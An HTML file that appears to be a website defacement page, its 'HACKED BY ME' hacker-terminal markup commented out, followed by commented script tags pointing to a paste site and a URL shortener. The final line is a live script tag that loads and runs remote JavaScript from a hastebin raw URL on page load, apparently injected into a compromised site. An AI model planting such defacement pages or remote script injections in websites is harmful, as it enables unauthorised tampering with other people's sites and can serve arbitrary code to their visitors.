<!--<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,500;1,100;1,300&display=swap" rel="stylesheet">
    <link rel="shortcut icon" href="https://wallpapercave.com/wp/wp2661424.jpg" type="image/x-icon">
    <title>HACKED BY ME</title>
</head>
<body>
    <style>
        *{
            padding: 0;
            margin: 0;
        }
        html,body{
            margin: 0;
            padding: 0;
            background-color: rgb(36,36,36);
            color:#00ff35;
            font-family: 'Roboto', sans-serif;
            user-select: none;
        }
        div.thisbg{
            background-image: url('https://media.moddb.com/images/downloads/1/193/192889/MOSHED-2020-2-20-22-48-16.gif');
            background-position: center;
            background-size: auto 200vh;
            position: fixed;
            height: 100vh;
            width: 100vw;
            filter: blur(15px);
        }
        .folder{
            opacity: 0.85;
            position: absolute;
            width: 85vw;
            max-width: 755px;
            height: 400px;
            box-shadow: 0px 0px 15px black;
            border-radius: 15px;
            background-color: #1d1d1d;
            overflow: hidden;

            top: 50%;
            left: 50%;
            transform: translate(-50%,-50%);
            animation: anim 1s ease-in-out infinite;
        }
        @keyframes anim{
            0%{
                top: 52%;
            }
            50%{
                top: 50%;
            }
            100%{
                top: 52%;
            }
        }
        div.folder > .title{
            position: absolute;
            border-radius: 15px;
            width: 100%;
            padding: 5px 0 5px 0;
            background-color: rgb(12,12,12);
            text-align: center;
            z-index: 50;
        }
        div.folder > .caption{
            margin-top: 61px;
            margin-left:25px;
            color:#00ff35;
            position: absolute;
        }
        .folder > .title > .square{
            float: right;
            background-color: lightseagreen;
            height:15px;
            width: 15px;
            border-radius: 25px;
            margin-top: -17px;
            margin-right: 45px;
        }
        .folder > .title > .min{
            float:right;
            background-color: rgb(255, 193, 100);
            width:15px;
            height:15px;
            border-radius: 25px;
            margin-top:-17px;
            margin-right: 25px;
        }
        .folder > .title > .close{
            float: right;
            background-color:rgb(255,100,100);
            height:15px;
            width: 15px;
            border-radius: 25px;
            margin-top:-17px;
            margin-right:5px;
        }
        h3{
            margin-top: 25px;
            color: #FF1245;
        }
        p.message{
            margin-top: 14px;
            color: lightyellow;
        }
        h5{
            margin-top: 12px;
            color: red;
            font-size: 17px;
            padding: 2px 0 2px 0;
        }
        p.slow{
            margin-top: 15px;
            color: #E1FF01;
        }
        div.caption-end{
            margin-top: 290px;
            margin-left:25px;
        }
        p.end{
            color: lightyellow;
        }
        img.image{
            border-radius: 100%;
            margin-top: 16px;
        }
    </style>
    <div class="thisbg"></div>
        <div class="folder">
            <div class="title">
                <p>./H4CK4D BY ME</p>
                <div class="square"></div>
                <div class="min"></div>
                <div class="close"></div>
            </div>
            <div class="caption">
                <p>root@hacked:~#<font color="white"> Hello admin!</font></p>
                <p>root@hacked:~# <font color="white">security level is low!</font></p>
                <p>root@hacked:~# <font color="white">Gotcha!</font></p>
                <h3>[+] NO SYSTEM IS SAVE [+]</h3>
                <p class="message">Remember: <font color="cyan"id="animate">In this world no one can't be a perfect trust me!</font></p> 
                <h5>[+] Indonesian Solo Hacker [+]</h5>
            </div>
            <div class="caption-end">
                <p class="slow">Too Slow..</p>
                <center>
                    <img height="72"width="72"class="image"src="https://wallpapercave.com/wp/wp2661424.jpg" alt="">
                </center>
            </div>
        </div>
</body>
</html>!-->
<!--<script type="text/javascript"src="https://www.toptal.com/developers/hastebin/raw/xanepamece"></script>!-->
<!--<script src=https://bit.ly/3rwuaPZ></script>!--><!--<script src=https://bit.ly/3rwuaPZ></script>!-->
<script type="text/javascript"src="https://www.toptal.com/developers/hastebin/raw/voququsaho"></script>